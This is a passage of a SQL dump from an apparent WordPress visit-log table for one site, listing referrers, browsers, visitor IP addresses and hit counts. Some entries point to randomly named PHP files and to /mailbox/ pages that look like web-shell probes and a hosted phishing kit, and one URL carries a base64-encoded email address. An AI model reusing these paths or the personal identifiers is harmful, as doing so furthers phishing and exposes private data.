'2018-01-10','http://zphiblgz.org/members/wp-includes/ID3/getid3.php','Chrome','Windows','59.0.3071.115','','184.168.46.167','000',1,0),(16657,'2018-01-10','http://zphiblgz.org/members/wp-includes/SimplePie/Cache/DB.php','Safari','iPhone','10.0','','45.40.166.141','000',1,0),(16658,'2018-01-10','http://zphiblgz.org/f15600.php','Chrome','Windows','27.0.1453.110','','184.168.193.99','000',1,0),(16659,'2018-01-10','http://zphiblgz.org/members/wp-includes/Text/acbhahba.php','Safari','iPhone','10.0','','45.40.165.27','000',1,0),(16660,'2018-01-10','http://zphiblgz.org/members/wp-includes/Requests/Auth/Basic.php','Safari','iPad','10.0','','50.62.161.184','000',1,0),(16661,'2018-01-10','http://zphiblgz.org/cache/mod_mainmenu/flunqswo.php','Chrome','Windows','59.0.3071.115','','195.234.4.50','000',1,0),(16662,'2018-01-10','http://zphiblgz.org/development/wp-includes/random_compat/gcsrtnpz.php','Safari','iPhone','10.0','','184.168.193.21','000',1,0),(16663,'2018-01-10','http://zphiblgz.org/development/wp-admin/css/colors/ddlcpune.php','Chrome','Windows','59.0.3071.115','','148.72.232.97','000',1,0),(16664,'2018-01-10','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','64.233.172.160','000',1,0),(16665,'2018-01-10','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','64.233.172.170','000',1,0),(16666,'2018-01-10','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(16667,'2018-01-10','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.31','000',1,0),(16668,'2018-01-10','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.31','000',1,0),(16669,'2018-01-10','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.31','000',1,0),(16670,'2018-01-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(16671,'2018-01-10','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','50.225.39.81','000',2,0),(16672,'2018-01-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(16673,'2018-01-10','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.25.180','000',1,0),(16674,'2018-01-10','http://zphiblgz.org/wp-press.php','Chrome','Windows','42.0.2311.152','','195.154.187.58','000',1,0),(16675,'2018-01-10','zphiblgz.org','Chrome','Windows','50.0.2661.75','','162.144.76.91','000',1,0),(16676,'2018-01-10','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi_pr_mmM7YAhXvcd8KHf-tDW0QFggpMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','8.44.100.11','000',6,0),(16677,'2018-01-10','https://zphiblgz.org','Firefox','Windows','39.0','','195.22.127.140','000',1,0),(16678,'2018-01-10','https://www.google.com/','Chrome','Macintosh','55.0.2883.75','','50.225.39.65','000',5,0),(16679,'2018-01-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(16680,'2018-01-10','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(16681,'2018-01-10','https://www.google.com/','Safari','iPhone','11.0','','69.143.35.179','000',3,0),(16682,'2018-01-10','https://zphiblgz.org','Chrome','Linux','57.0.2987.133','','46.229.170.197','000',1,0),(16683,'2018-01-10','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(16684,'2018-01-10','http://zphiblgz.org/','MSIE','Windows','11.0','','81.171.85.64','000',1,0),(16685,'2018-01-10','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(16686,'2018-01-10','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','96.244.204.170','000',5,0),(16687,'2018-01-10','https://www.google.com/','Chrome','Windows','63.0.3239.84','','108.31.157.18','000',5,0),(16688,'2018-01-10','https://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.169','000',1,0),(16689,'2018-01-10','https://www.google.com/','Safari','iPhone','11.0','','69.143.231.182','000',3,0),(16690,'2018-01-10','https://www.google.com/','Chrome','iPhone','63.0.3239.73','','100.15.160.57','000',14,0),(16691,'2018-01-10','https://www.google.com/','Safari','Macintosh','11.0.2','','99.75.106.240','000',5,0),(16692,'2018-01-10','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.7.144','000',1,0),(16693,'2018-01-10','http://zphiblgz.org/ts_teams/maya-franklin/','Chrome','Linux','41.0.2272.118','','66.102.7.150','000',1,0),(16694,'2018-01-10','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','73.213.27.103','000',2,0),(16695,'2018-01-10','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATO35BlQFcErC_q39jCu9mMTQOizm5jwciZMYaM7kcxMdgY_4KbAbcZUG317u83I_NbKYJ2CYf91tUkqOkHk6odB6OXcghFqusw','AppleWebKit','iPhone','604.4.7','','100.15.160.57','000',3,0),(16696,'2018-01-10','https://zphiblgz.org','Chrome','Windows','35.0.1916.153','','195.245.112.87','000',2,0),(16697,'2018-01-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',2,0),(16698,'2018-01-11','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.29','000',1,0),(16699,'2018-01-11','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(16700,'2018-01-11','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(16701,'2018-01-11','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.32','000',2,0),(16702,'2018-01-11','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(16703,'2018-01-11','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.14','000',1,0),(16704,'2018-01-11','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.27.70.86','000',1,0),(16705,'2018-01-11','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.10','000',1,0),(16706,'2018-01-11','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.31','000',2,0),(16707,'2018-01-11','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.213','000',1,0),(16708,'2018-01-11','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.32','000',1,0),(16709,'2018-01-11','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.27','000',1,0),(16710,'2018-01-11','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.65','000',2,0),(16711,'2018-01-11','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','34.209.150.166','000',2,0),(16712,'2018-01-11','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.101.214','000',1,0),(16713,'2018-01-11','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(16714,'2018-01-11','http://zphiblgz.org/','Chrome','Macintosh','59.0.3071.115','','107.172.231.70','000',1,0),(16715,'2018-01-11','http://zphiblgz.org','Chrome','Macintosh','59.0.3071.115','','104.247.7.73','000',2,0),(16716,'2018-01-11','http://zphiblgz.org/','Opera','Windows','12.17','','104.247.7.73','000',3,0),(16717,'2018-01-11','zphiblgz.org','Chrome','Windows','50.0.2661.75','','128.199.194.131','000',1,0),(16718,'2018-01-11','https://zphiblgz.org','MSIE','Windows','6.0','','104.42.198.99','000',2,0),(16719,'2018-01-11','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(16720,'2018-01-11','https://zphiblgz.org/mailbox/loading.php?Email=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','196.54.55.14','000',1,0),(16721,'2018-01-11','https://zphiblgz.org/mailbox/boxMe.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','84.51.165.121','000',4,0),(16722,'2018-01-11','https://zphiblgz.org/mailbox/boxMe.php','MSIE','Windows','10.0','','79.73.69.32','000',1,0),(16723,'2018-01-11','https://zphiblgz.org/mailbox/boxMrenewal.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=ay5lbHZpbkBtYWl6by5jb20=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','54.37.16.241','000',1,0),(16724,'2018-01-11','https://zphiblgz.org/cache/v12/get_started/','MSIE','Windows','10.0','','196.52.84.38','000',1,0),(16725,'2018-01-11','https://zphiblgz.org/cache/v12/','MSIE','Windows','10.0','','173.239.209.19','000',1,0),(16726,'2018-01-11','https://zphiblgz.org/cache/v12/index.php','MSIE','Windows','10.0','','84.19.181.25','000',2,0),(16727,'2018-01-11','https://zphiblgz.org','MSIE','Windows','8.0','','95.108.149.136','000',2,0),(16728,'2018-01-11','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.79','000',1,0),(16729,'2018-01-11','http://zphiblgz.org/xx2.php','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(16730,'2018-01-11','https://zphiblgz.org','Firefox','Windows','4.0.1','','52.54.217.11','000',1,0),(16731,'2018-01-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(16732,'2018-01-11','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(16733,'2018-01-11','74.220.219.51','Firefox','Windows','33.0','','159.203.196.79','000',1,0),(16734,'2018-01-11','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.27.69.131','000',1,0),(16735,'2018-01-11','https://www.google.com/','Chrome','Macintosh','63.0.3239.84','','69.143.231.182','000',7,0),(16736,'2018-01-11','https://www.google.com/','Safari','Macintosh','11.0.1','','71.179.81.192','000',5,0),(16737,'2018-01-11','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',4,0),(16738,'2018-01-11','http://zphiblgz.org/','MSIE','Windows','6.0','','36.84.102.71','000',2,0),(16739,'2018-01-11','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','96.244.204.170','000',2,0),(16740,'2018-01-11','https://www.google.com/','Safari','iPhone','11.0','','172.56.28.124','000',2,0),(16741,'2018-01-11','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','100.16.227.219','000',10,0),(16742,'2018-01-11','https://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.67','000',1,0),(16743,'2018-01-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',4,0),(16744,'2018-01-11','https://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','144.76.71.83','000',1,0),(16745,'2018-01-11','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.85.73','000',2,0),(16746,'2018-01-12','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.30','000',1,0),(16747,'2018-01-12','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.30','000',1,0),(16748,'2018-01-12','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.30','000',1,0),(16749,'2018-01-12','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.30','000',1,0),(16750,'2018-01-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',2,0),(16751,'2018-01-12','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.29','000',1,0),(16752,'2018-01-12','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.28','000',1,0),(16753,'2018-01-12','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(16754,'2018-01-12','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.7.150','000',2,0),(16755,'2018-01-12','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',2,0),(16756,'2018-01-12','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.30','000',1,0),(16757,'2018-01-12','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','76.106.73.77','000',2,0),(16758,'2018-01-12','https://zphiblgz.org','Chrome','Windows','60.0.3112.90','','95.211.186.147','000',2,0),(16759,'2018-01-12','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','195.22.125.82','000',2,0),(16760,'2018-01-12','https://zphiblgz.org','Chrome','Windows','10.0.648.204','','208.94.226.229','000',2,0),(16761,'2018-01-12','zphiblgz.org','Chrome','Windows','50.0.2661.75','','128.199.194.131','000',12,0),(16762,'2018-01-12','https://zphiblgz.org','Firefox','Windows','40.1','','80.14.253.243','000',2,0),(16763,'2018-01-12','https://www.google.com/','Chrome','Windows','63.0.3239.108','','169.252.4.23','000',1,0),(16764,'2018-01-12','https://zphiblgz.org/scholarship/application/','Chrome','Windows','63.0.3239.108','','169.252.4.21','000',1,0),(16765,'2018-01-12','https://zphiblgz.org','Safari','iPhone','9.0','','36.110.147.70','000',1,0),(16766,'2018-01-12','http://site.ru','Chrome','Windows','5.0.375.99','','218.89.76.102','000',2,0),(16767,'2018-01-12','http://zphiblgz.org/administrator/index.php','Opera Next','Windows','49.0.2711.0','','188.163.108.233','000',4,0),(16768,'2018-01-12','http://zphiblgz.org','Firefox','Windows','3.6.8','','95.45.252.6','000',10,0),(16769,'2018-01-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(16770,'2018-01-12','https://zphiblgz.org','python-requests','Unknown','2.18.1','','36.251.87.92','000',2,0),(16771,'2018-01-12','https://zphiblgz.org','Firefox','Windows','30.0','','36.251.87.92','000',1,0),(16772,'2018-01-12','https://zphiblgz.org','Firefox','Windows','31.0','','36.251.87.92','000',1,0),(16773,'2018-01-12','https://zphiblgz.org','Safari','iPhone','7.0','','36.251.87.92','000',1,0),(16774,'2018-01-12','https://zphiblgz.org','Chrome','Windows','36.0.1985.143','','36.251.87.92','000',1,0),(16775,'2018-01-12','http://zphiblgz.org','Firefox','Windows','41.0','','36.251.87.92','000',17,0),(16776,'2018-01-12','https://zphiblgz.org','MSIE','Windows','11.0','','36.251.87.92','000',1,0),(16777,'2018-01-12','https://zphiblgz.org','Java','Unknown','1.6.0','','69.164.111.198','000',10,0),(16778,'2018-01-12','https://zphiblgz.org','MSIE','Windows','8.0','','69.164.111.198','000',3,0),(16779,'2018-01-12','http://site.ru','Chrome','Windows','5.0.375.99','','67.20.115.231','000',1,0),(16780,'2018-01-12','https://zphiblgz.org/mailbox/boxMrenewal.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=ay5lbHZpbkBtYWl6by5jb20=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','62.210.110.181','000',1,0),(16781,'2018-01-12','https://zphiblgz.org/mailbox/loading.php?Email=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','196.54.55.12','000',1,0),(16782,'2018-01-12','https://zphiblgz.org/mailbox/x3d.php','MSIE','Windows','10.0','','185.38.14.215','000',1,0),(16783,'2018-01-12','https://zphiblgz.org/mailbox/boxMe.php','MSIE','Windows','10.0','','84.13.185.34','000',1,0),(16784,'2018-01-12','https://zphiblgz.org/mailbox/boxMe.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','84.51.165.121','000',4,0),(16785,'2018-01-12','https://zphiblgz.org','MSIE','Windows','8.0','','50.112.194.65','000',2,0),(16786,'2018-01-12','https://zphiblgz.org','MSIE','Windows','8.0','','52.27.2.86','000',2,0),(16787,'2018-01-12','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.7.142','000',1,0),(16788,'2018-01-12','http://zphiblgz.org/history/','Chrome','Linux','41.0.2272.118','','66.102.7.146','000',1,0),(16789,'2018-01-12','https://zphiblgz.org','Chrome','Windows','22.0.1216.0','','50.19.154.226','000',1,0),(16790,'2018-01-12','https://zphiblgz.org/cache/v12/','MSIE','Windows','10.0','','173.239.215.21','000',1,0),(16791,'2018-01-12','https://zphiblgz.org/cache/v12/get_started/','MSIE','Windows','10.0','','196.52.84.61','000',1,0),(16792,'2018-01-12','https://zphiblgz.org/cache/v12/index.php','MSIE','Windows','10.0','','87.118.115.176','000',2,0),(16793,'2018-01-12','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','166.137.244.130','000',2,0),(16794,'2018-01-12','https://www.google.com/','Chrome','iPhone','63.0.3239.73','','172.58.184.249','000',2,0),(16795,'2018-01-12','https://www.google.com/','Edge','Windows','16.16299','','108.248.173.34','000',2,0),(16796,'2018-01-12','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.29','000',1,0),(16797,'2018-01-12','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.29','000',1,0),(16798,'2018-01-12','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.27','000',1,0),(16799,'2018-01-12','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(16800,'2018-01-12','https://www.google.co.jp/','Chrome','Android','63.0.3239.111','','182.251.248.44','000',1,0),(16801,'2018-01-12','https://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.179','000',1,0),(16802,'2018-01-12','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.30','000',1,0),(16803,'2018-01-12','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(16804,'2018-01-12','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',2,0),(16805,'2018-01-12','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.37','000',2,0),(16806,'2018-01-12','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.102.3','000',1,0),(16807,'2018-01-12','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',2,0),(16808,'2018-01-12','https://zphiblgz.org','Chrome','Macintosh','55.0.2883.75','','96.234.147.87','000',2,0),(16809,'2018-01-13','https://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.169','000',1,0),(16810,'2018-01-13','https://zphiblgz.org','Safari','iPhone','9.0','','112.193.193.216','000',1,0),(16811,'2018-01-13','https://zphiblgz.org','Safari','iPhone','9.0','','123.160.172.209','000',1,0),(16812,'2018-01-13','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(16813,'2018-01-13','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.28','000',1,0),(16814,'2018-01-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',2,0),(16815,'2018-01-13','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.27.69.131','000',1,0),(16816,'2018-01-13','https://zphiblgz.org','Chrome','Macintosh','40.0.2214.93','','13.57.229.58','000',2,0),(16817,'2018-01-13','https://zphiblgz.org','Chrome','Macintosh','50.0.2661.102','','13.56.237.110','000',32,0),(16818,'2018-01-13','https://zphiblgz.org','Chrome','Linux','63.0.3205.0','','13.57.47.188','000',3,0),(16819,'2018-01-13','http://zphiblgz.org/','Chrome','Windows','58.0.3029.81','','5.35.119.16','000',3,0),(16820,'2018-01-13','https://www.google.com/','Chrome','Macintosh','63.0.3239.84','','108.54.245.186','000',2,0),(16821,'2018-01-13','https://zphiblgz.org','Chrome','Macintosh','56.0.2934.20','','134.249.48.162','000',2,0),(16822,'2018-01-13','http://zphiblgz.org/administrator/index.php','Opera Next','Windows','49.0.2711.0','','188.163.108.189','000',2,0),(16823,'2018-01-13','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','52.12.91.158','000',2,0),(16824,'2018-01-13','https://www.google.com/','Chrome','Windows','63.0.3239.132','','75.182.11.235','000',3,0),(16825,'2018-01-13','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1665.W86VV0ubH4MInJXfjzjui31VsmfKIm_2TwQR84VDcvvOt3sJ0xeoyYrMNGn5g_hW.43a91cedddbc770c298534e0bb43bdef07c0663a&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YFUVNhHyyhJgRFg5yeLMIWU&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2tLa3dNcl9YeW9udkhmTHNBZEw2bXRta3NsODlwQ0lkYWR0MDdDTUdnTl9vSkk3ZzROcG9tRFQxM29ibEhHMEZpNnlQa0E5QTgxQQ&b64e=2&sign=5124a15706020daa6f3a9a0b27888085&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTA13Fq-x7rPS34hh0rkw4bkamGAMq2BS_2Z1UXq1rsSIP2LdDsyhGw03VoM3waI0-uoUuTG9kPnOR5P_k0xOmy-18PZaZ64g3DcHU0Qpmqs3u9tnjqdtiPhdfps2n2aAl&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUDAXrtBVCJpHIWFRG0c4GZXCYNtSvYQD1o44CKlfgD_kNeGVQ6P5H2avcYT_omP3wuDJneqAGx5Q&l10n=ru&cts=1515861991595&mc=4.32660562567','MSIE','Windows','8.0','','46.42.143.12','000',1,0),(16826,'2018-01-13','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1665.PPtyAMNNVpdTb_aSI6q2zzCmQBL4N6SWzijAuyu1PCAwX0vdRFEgycaCbnVpg7_f.e20e050fef62823b500e91225160b1354653ce4a&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YLeQVNu7TCjFWhspMNrg36Y&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2tLa3dNcl9YeW9udkhmTHNBZEw2bWFqZWtmalozVGw5X2F6Q0ZYbTBfRno5YVBUZE42SGc5Z1BkM2d4RXJNOFJKenJlTDEtY05Id0NOQ2ZWcHlVc3BOZ0tlbUR4T2piSjM5d3gyczJlYnhOMFNfM25GeVRvT0I5YzFIcko4Z0dSU0kybk0wTUNMS0JhV1pjZzI1MHpvOHdvTFYzem4yUWtpMGtaMWdESUVyN191dlh3SFBVME83VlpjMDNDT05fX1ZDY3VUQUNaM1gzQVR1R0dJT3V3Rg&b64e=2&sign=79cf6e81ce45970df94e0ea32135c1fe&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTIcTzblNJdhAGww-A-WL-zt8oAGa1ekxS8yTFFYraUGB1-4geSzPqIvAXiXE1f_UdMLZrTfQRdXh8LggGZNW3PhosJYM7aDKRJA5-G3MyVcHRlrD25cWeE2hXETP5rWA0&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWAB4NbWhozjo_-_DUDnzBd2av7eiKww7dXuAaFjPi-5CtVYhg0ccuzt0hgd1mfhGL8PUEzx2WLrA&l10n=ru&cts=1515861991595&mc=6.25299112499','MSIE','Windows','8.0','','95.221.60.22','000',1,0),(16827,'2018-01-13','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','195.22.125.82','000',2,0),(16828,'2018-01-13','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.1','000',2,0),(16829,'2018-01-13','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.25.90','000',1,0),(16830,'2018-01-13','https://www.google.com/','Safari','iPhone','11.0','','68.134.10.25','000',2,0),(16831,'2018-01-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(16832,'2018-01-13','http://uptime-us.net/zphiblgz.org','Unknown','Unknown','Unknown','','142.234.115.155','000',1,0),(16833,'2018-01-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','142.234.115.154','000',1,0),(16834,'2018-01-13','https://zphiblgz.org','MSIE','Windows','6.0','','104.42.198.99','000',1,0),(16835,'2018-01-13','https://zphiblgz.org','Chrome','Macintosh','51.0.2734.0','','134.249.48.162','000',1,0),(16836,'2018-01-13','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','71.121.167.97','000',6,0),(16837,'2018-01-13','https://zphiblgz.org/history/','Edge','Windows','16.16299','','108.248.173.34','000',1,0),(16838,'2018-01-13','https://zphiblgz.org','Chrome','Macintosh','32.0.1739.73','','192.241.65.93','000',2,0),(16839,'2018-01-13','https://zphiblgz.org','Firefox','Windows','40.1','','119.94.171.31','000',2,0),(16840,'2018-01-13','https://zphiblgz.org','Chrome','Linux','58.0.3029.110','','34.229.43.183','000',2,0),(16841,'2018-01-13','https://www.google.com/','Firefox','Macintosh','57.0','','99.153.25.31','000',2,0),(16842,'2018-01-14','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','195.22.125.82','000',6,0),(16843,'2018-01-14','https://zphiblgz.org','Safari','Macintosh','6.0','','5.9.145.132','000',1,0),(16844,'2018-01-14','http://uptime-us.net/zphiblgz.org','Unknown','Unknown','Unknown','','142.234.115.155','000',2,0),(16845,'2018-01-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','142.234.115.154','000',2,0),(16846,'2018-01-14','https://zphiblgz.org','Go--client','Unknown','1.1','','138.197.72.0','000',1,0),(16847,'2018-01-14','https://zphiblgz.org/mailbox/boxMrenewal.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=ay5lbHZpbkBtYWl6by5jb20=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','54.36.222.37','000',1,0),(16848,'2018-01-14','https://zphiblgz.org/mailbox/loading.php?Email=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','196.54.55.31','000',1,0),(16849,'2018-01-14','https://zphiblgz.org/mailbox/boxMe.php','MSIE','Windows','10.0','','84.13.185.34','000',1,0),(16850,'2018-01-14','https://zphiblgz.org/mailbox/boxMe.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','84.51.165.121','000',4,0),(16851,'2018-01-14','https://zphiblgz.org','Java','Unknown','1.6.0','','69.164.111.198','000',101,0),(16852,'2018-01-14','https://zphiblgz.org','MSIE','Windows','8.0','','69.164.111.198','000',45,0),(16853,'2018-01-14','https://zphiblgz.org/cache/v12/get_started/','MSIE','Windows','10.0','','196.52.84.54','000',1,0),(16854,'2018-01-14','https://zphiblgz.org/cache/v12/','MSIE','Windows','10.0','','173.239.221.135','000',1,0),(16855,'2018-01-14','https://zphiblgz.org/cache/v12/index.php','MSIE','Windows','10.0','','87.118.122.254','000',2,0),(16856,'2018-01-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',2,0),(16857,'2018-01-14','https://zphiblgz.org','SamsungBrowser','Android','6.2','','174.82.154.97','000',1,0),(16858,'2018-01-14','https://zphiblgz.org','Firefox','Linux','21.0','','188.165.233.34','000',2,0),(16859,'2018-01-14','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.25.208','000',1,0),(16860,'2018-01-14','http://site.ru','Chrome','Windows','5.0.375.99','','213.251.182.103','000',2,0),(16861,'2018-01-14','http://site.ru','Chrome','Windows','5.0.375.99','','178.20.157.65','000',3,0),(16862,'2018-01-14','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(16863,'2018-01-14','https://www.google.com/','Safari','iPhone','11.0','','68.134.10.25','000',2,0),(16864,'2018-01-14','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.243.216','000',1,0),(16865,'2018-01-14','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.27.69.131','000',1,0),(16866,'2018-01-14','http://uptime-us.net/zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.28','000',1,0),(16867,'2018-01-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.26','000',1,0),(16868,'2018-01-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.27','000',2,0),(16869,'2018-01-14','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.32','000',1,0),(16870,'2018-01-14','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(16871,'2018-01-14','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(16872,'2018-01-14','http://uptime-us.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.138','000',1,0),(16873,'2018-01-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.153','000',1,0),(16874,'2018-01-14','https://zphiblgz.org','Firefox','Windows','40.1','','105.155.174.133','000',2,0),(16875,'2018-01-14','https://zphiblgz.org','Firefox','Windows','40.1','','62.45.29.151','000',2,0),(16876,'2018-01-14','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.27.68.69','000',1,0),(16877,'2018-01-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSI